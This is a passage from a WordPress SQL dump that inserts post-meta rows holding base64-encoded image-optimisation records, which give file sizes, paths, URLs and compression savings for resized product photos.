udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tODAweDUzMi5qcGciLCJyZWR1Y3Rpb24iOjI2NjUsInRpbWUiOjE0ODM1NzM0MzksImlkIjoxMjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6MjQ1NCwidGltZSI6MTQ4MzU3MzQ0MywiaWQiOjEyODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMTYwMHgxMDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjgwNDksInRpbWUiOjE0ODM1NzM0NDgsImlkIjoxMjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTg0LCJ0aW1lIjoxNDgzNTczNDUyLCJpZCI6MTI4OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ2NiwidGltZSI6MTQ4MzU3MzQ1NSwiaWQiOjEyODl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MTIsInRpbWUiOjE0ODM1NzM0NTksImlkIjoxMjg5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjE1OCwidGltZSI6MTQ4MzU3MzQ2MywiaWQiOjEyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQ5OSwidGltZSI6MTQ4MzU3MzQ2NiwiaWQiOjEyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjU3OSwidGltZSI6MTQ4MzU3MzQ2OSwiaWQiOjEyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjcyOCwidGltZSI6MTQ4MzU3MzQ3MywiaWQiOjEyODl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjExOTQsInRpbWUiOjE0ODM1NzM0NzYsImlkIjoxMjg5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxNDA3LCJ0aW1lIjoxNDgzNTczNDgwLCJpZCI6MTI4OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL29wdGVvbi1zaW9uLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvb3B0ZW9uLXNpb24tNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9vcHRlb24tc2lvbi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MjU0OCwidGltZSI6MTQ4MzU3MzQ4NCwiaWQiOjEyODl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29621, 1285, 'wpfc_optimisation_reduction', '3170506'); 
INSERT INTO `wp_postmeta` VALUES (29622, 1285, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwuanBnIiwid2lkdGgiOjQzNjgsImhlaWdodCI6MjkxMiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwuanBnIiwicmVkdWN0aW9uIjozMTcwNDkyLCJ0aW1lIjoxNDgzNTczNDk3LCJpZCI6IjEyODUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzUwMCwiaWQiOjEyODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNTAzLCJpZCI6MTI4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM1MDYsImlkIjoxMjg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNTEwLCJpZCI6MTI4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM1MTIsImlkIjoxMjg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzUxNSwiaWQiOjEyODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNTE4LCJpZCI6MTI4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM1MjAsImlkIjoxMjg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNTIzLCJpZCI6MTI4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzUyNiwiaWQiOjEyODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM1MjgsImlkIjoxMjg1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNTMwLCJpZCI6MTI4NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzUzMywiaWQiOjEyODV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM1MzYsImlkIjoxMjg1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29623, 1282, 'wpfc_optimisation_reduction', '17198'); 
